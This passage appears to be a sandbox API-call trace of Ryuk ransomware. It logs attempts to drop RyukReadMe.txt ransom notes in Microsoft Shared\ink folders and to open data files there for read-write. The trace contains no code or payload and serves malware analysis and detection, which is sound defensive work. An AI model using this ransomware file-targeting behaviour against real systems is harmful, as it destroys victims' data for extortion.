hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.306] SetLastError (dwErrCode=0x0) [0161.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.306] GetLastError () returned 0x5 [0161.306] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.307] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.307] SetLastError (dwErrCode=0x0) [0161.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.307] GetLastError () returned 0x5 [0161.307] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.307] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.307] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.307] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.307] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.307] SetLastError (dwErrCode=0x0) [0161.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.307] GetLastError () returned 0x5 [0161.307] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.308] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.308] SetLastError (dwErrCode=0x0) [0161.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.308] GetLastError () returned 0x5 [0161.308] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.308] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.308] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.308] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.308] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.308] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.308] SetLastError (dwErrCode=0x0) [0161.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.309] GetLastError () returned 0x5 [0161.309] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.309] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.309] SetLastError (dwErrCode=0x0) [0161.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.309] GetLastError () returned 0x5 [0161.309] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.309] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.309] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.309] SetLastError (dwErrCode=0x0) [0161.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.309] GetLastError () returned 0x5 [0161.309] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.309] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", dwFileAttributes=0x80) returned 0 [0161.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.310] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.310] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.310] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.310] SetLastError (dwErrCode=0x0) [0161.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.310] GetLastError () returned 0x5 [0161.310] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.311] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.311] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.311] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.311] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.311] SetLastError (dwErrCode=0x0) [0161.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.311] GetLastError () returned 0x5 [0161.311] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.311] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", dwFileAttributes=0x80) returned 0 [0161.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.312] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.312] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", dwFileAttributes=0x80) returned 0 [0161.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.312] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.312] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.313] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", dwFileAttributes=0x80) returned 0 [0161.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.313] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.313] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.313] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", dwFileAttributes=0x80) returned 0 [0161.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.314] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.314] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", dwFileAttributes=0x80) returned 0 [0161.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.314] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.314] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", dwFileAttributes=0x80) returned 0 [0161.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.315] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.315] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", dwFileAttributes=0x80) returned 0 [0161.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.315] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.315] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.315] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.315] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.316] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.316] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", dwFileAttributes=0x80) returned 0 [0161.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.316] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.316] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", dwFileAttributes=0x80) returned 0 [0161.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.317] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.317] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", dwFileAttributes=0x80) returned 0 [0161.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.317] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.317] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", dwFileAttributes=0x80) returned 0 [0161.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.318] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.318] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.318] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", dwFileAttributes=0x80) returned 0 [0161.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.318] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.318] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", dwFileAttributes=0x80) returned 0 [0161.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.319] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.319] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", dwFileAttributes=0x80) returned 0 [0161.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.320] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.320] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", dwFileAttributes=0x80) returned 0 [0161.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.320] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.320] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.320] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", dwFileAttributes=0x80) returned 0 [0161.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.321] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.321] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.321] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", dwFileAttributes=0x80) returned 0 [0161.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.321] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.321] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.321] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", dwFileAttributes=0x80) returned 0 [0161.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: 